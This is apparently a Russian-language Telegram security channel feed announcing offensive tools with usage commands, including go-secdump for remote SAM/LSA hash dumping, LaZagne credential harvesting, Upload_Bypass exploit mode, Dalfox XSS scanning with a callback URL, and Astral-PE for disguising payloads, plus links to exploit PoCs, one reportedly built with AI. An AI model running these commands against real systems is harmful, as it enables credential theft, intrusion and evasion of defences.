Whitehat Lab
2.1K subscribers
344 photos
393 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
💻 NTLM Relay атаки: все, что вам необходимо знать

⌨️ Очень большая и подробная статья на английском языке. Рекомендую к прочтению!

✍️ NTLM Relay Attacks

⚙️ Инструменты:

😹 Responder
😹 Inveigh
😹 PetitPotam
😹 Rubeus
😹 Sharpmad

#windows #relay #ntlm #redteam

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
6👍2🔥1
💻 Living off the Foreign Land Cmdlets and Binaries

Неплохая шпаргалка по бинарным файлам, 💻Powershell командлетам и mmc оснасткам

😉 LOFLCAB
😹 Home

#windows #redteam #powershell #mmc

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 😀 CATS v13.1.1 (Contract API Testing and Security)

Продвинутый REST API фаззер с высокой скоростью работы. Строит HTML отчеты по окончании. Очень подробная документация на официальном сайте. Написан на 💻 Java

UPD. Большое обновление отличного инструмента до 13ой версии - notes

Запуск в режиме black box:

cats --contract=openapi.yml -H "Authorization=$token" --server=https://api-url.com -b -k


Запуск в режиме context mode:

cats --contract=openapi.yaml --server=https://localhost:8080 --headers=headers.yml --refData=referenceData.yml


Запуск в режиме continuous fuzzing:

cats random --contract=openapi.yaml --server=https://localhost:8080 -H "API-KEY=$token" --mc 500 --path "/users/auth" -X POST --stopAfterTimeInSec 10


💻 Github
💻 Download
📔 Docs
📚 Тестируем Github API с CATS

#soft #cats #java #fuzzer

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
4
Forwarded from Adaptix Framework
Начал писать версию 0.4. Очень много нужно поменять в архитектуре экстендеров.

А пока покажу вот такие прикольные расширения: иногда легче "попросить" у пользователя учетные данные, нежели откуда-то извлекать)

P.S. pr на гите для расширений принимаются
🔥103
Каков путь ? Только честно! 😄
Anonymous Poll
50%
Whitehat
21%
Blackhat
17%
Greyhat
11%
Другое, в комментарии
5421
📞 Upload_Bypass v3.0.9-dev

Инструмент, предназначенный для тестирования механизмов загрузки файлов (upload forms). Использует различные методы поиска ошибок, чтобы упростить процесс выявления и эксплуатации уязвимостей.

С простенькими формами и уязвимостями справляется, тестировалось на машине HackTheBox - Magic

Работает с request файлом взятым из 😈 Burp, в Repeater ПКМ - copy to file. Заменить содержимое, имя файла и mime type на *content*, *filename*, *mimetype* соответственно.

Установка:

git clone https://github.com/sAjibuu/Upload_Bypass.git

pip install -r requirements.txt


Режим детектирования:

python upload_bypass.py -r test -s 'File uploaded successfully' -E php -D /uploads --burp --detect


Режим эксплуатации:

python upload_bypass.py -r test -s 'File uploaded successfully' -E php -D /uploads --burp --exploit


Anti malware mode:

 python upload_bypass.py -r test -s 'File uploaded successfully' -E php -D /uploads --burp --anti_malware


💻 Home

#web #pentest #upload #python #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
4👌2
Forwarded from Похек
Охотники на баги и где они обитают: итоги опроса о багхантинге
#bugbounty #bughunters #багбаунти #багхантинг

PT сделали исследование и написали спец статью для Хабр о портрете багхантеров, получилось интересно, хоть и с призмой явного перевеса в "свою сторону"))


В мире, где цифровые технологии пронизывают все аспекты жизни, безопасность разработки становится не просто важной, а критически необходимой. Однако с ростом сложности IT-решений и ускорением темпов обновлений обеспечить безупречную защиту данных и пользовательского опыта становится всё труднее. В таких условиях компании всё чаще обращаются к сообществу, запуская программы багхантинга — поиска уязвимостей силами внешних специалистов за вознаграждение.

Мы решили узнать, как российское IT-сообщество воспринимает багхантинг, и провели опрос среди читателей Хабра. Более 300 человек прошли тест до конца, около 1000 ответили на часть вопросов, что позволило нам составить портрет современного багхантера. Спасибо всем участникам! А теперь давайте разберёмся, что же удалось выяснить. В конце каждого раздела дадим галерею с итогами опроса, чтобы вы могли посмотреть на полное распределение процентов по ответам.

P.S. очень классные картинки нагенерили))

🔗Изучить исследдование

🌚 @poxek | 🌚 blog.poxek.cc | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Please open Telegram to view this post
VIEW IN TELEGRAM
71
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Часто же бывает такое, что необходимо найти машины, на которых работают определенные пользователи. Скрипт показывает сессии на всех хостах, которые дернет из LDAP.

https://github.com/p0dalirius/FindUnusualSessions

#pentest #redteam #ad #enum
🔥5🫡1
🔄🖼️ go-secdump v0.5.0

Инструмент для удалённого извлечения хешей и копирования чувствительных 🏠 Windows файлов (SAM, LSA) без сохранения на диск

Добавлено:

Go-secdump can now dump the registry secrets without changing any DACLs thanks to the SeBackupPrivilege


Пример:

./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --sam

./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --lsa

./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --dcc2


Relay:

./go-secdump.exe --host 192.168.0.100 -n --relay


Основные опции:

--host <target>
-P, --port <port>
-d, --domain <domain>
-u, --user <username>
-p, --pass <pass>
-n, --no-pass
--hash <NT Hash>
--local
-k, --kerberos
--dc-ip
--target-ip
--aes-key
--dump
--sam
--lsa
--dcc2
--relay
--relay-port <port>


💻 Home
💻 Download

#soft #golang #redteam #gosecdump

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
31
🎩 How I Used AI to Create a Working Exploit for CVE-2025-32433

Исследование о нашумевшей уязвимости в SSH реализации от Erlang/(OTP) которой присвоили оценку по CVSS - 10.0

😉 Research
😹 PoC

#research #cve #poc

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥1
🔄🔺 Dalfox 2.11.0

Мощный инструмент для поиска и обнаружения XSS уязвимостей. Написан на 🖼️ Go

UPD. 2.11

Установка:

go install github.com/hahwul/dalfox/v2@latest


Пример:

dalfox url https://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff -b https://your-callback-url


💻 Home
🔠 Wiki

#soft #dalfox #golang

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Offensive Xwitter
😈 [ hasherezade @hasherezade ]

Centralized resource for listing and organizing known injection techniques and POCs:

🔗 https://github.com/itaymigdal/awesome-injection

🐥 [ tweet ][ quote ]
👍3
🔄✖️ Astral-PE v1.6.0.0

Протектор для 💻 Windows PE файлов
Изменяет важные структуры - timestamps, headers, section flags, debug info, import/export

⚙️ Использование:

./Astral-PE.exe payload.exe -o payload_clean.exe


😹 Home
😹 Download

#astralpe #mutator

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
🔄 📞 The LaZagne Project v2.4.7

Инструмент для восстановления забытых 😄 паролей, написан на Python 💻 На самом деле средство пост эксплуатации, поддерживается большое количество программ: браузеры, IM, почтовые клиенты.

UPD. Автор добавил поддержку Яндекс браузера

📌 Список поддерживаемого ПО

Примеры использования
:

laZagne.exe all
laZagne.exe browsers -firefox
laZagne.exe all -oA -output C:\Users\test\Desktop
laZagne.exe all -quiet -oA
laZagne.exe all -password Password


💻 Home
💻 Download

#lazagne #python #password #recovery #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5😁221
🖼️ minikube v1.35.0

Локальный Kubernetes в Linux, Windows и MacOS

Фичи:

▪️ LoadBalancer
▪️ Multi-cluster
▪️ NodePorts
▪️ Persistent Volumes
▪️ Ingress


Установка в Linux:

curl -LO https://storage.googleapis.com/minikube/releases/latest/minikube_latest_amd64.deb
sudo dpkg -i minikube_latest_amd64.deb


Основные команды:

minikube start
minikube dashboard
kubectl create deployment hello-minikube --image=kicbase/echo-server:1.0
kubectl expose deployment hello-minikube --type=NodePort --port=8080
minikube service hello-minikube
minikube start --kubernetes-version=latest
minikube stop
minikube delete
minikube delete --all


😹 Home
😉 Docs

#kubernetes #minikube #devops

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🤷11
⚙️ CVE-2025-21204 - Windows Update Stack LPE

Повышение привилегий (LPE) в 💻 Windows системах. После установки штатных апдейтов у некоторых пользователей появилась директория C:\inetpub, обычно используется в рамках работы веб-сервера IIS, у меня например появилась. Это если что такой фикс от микрософт 😁 и удалять ее не стоит.

😉 Research
😉 PoC

#windows #lpe #poc

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍1
🎩 🗂 Доклады с конференции Black Hat Asia 2025

⌨️

DriveThru Car Hacking Fast Food, Faster Data Breach
KernJC Automated Vulnerable Environment Generation for Linux Kernel Vulnerabilities
vCenter Lost How the DCERPC Vulnerabilities Changed the Fate of ESXi
etc.


😹 Home
😹 Download

#pentest #blackhat #blackhatasia

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍1
😁9🤔2
Виноваты безопасники ?
Anonymous Poll
23%
Да
28%
Нет
48%
Я безопасник 😅
🤝122